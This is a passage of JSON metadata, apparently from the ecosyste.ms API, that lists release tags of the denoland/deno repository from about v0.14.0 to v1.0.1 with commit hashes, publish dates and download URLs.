api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.gith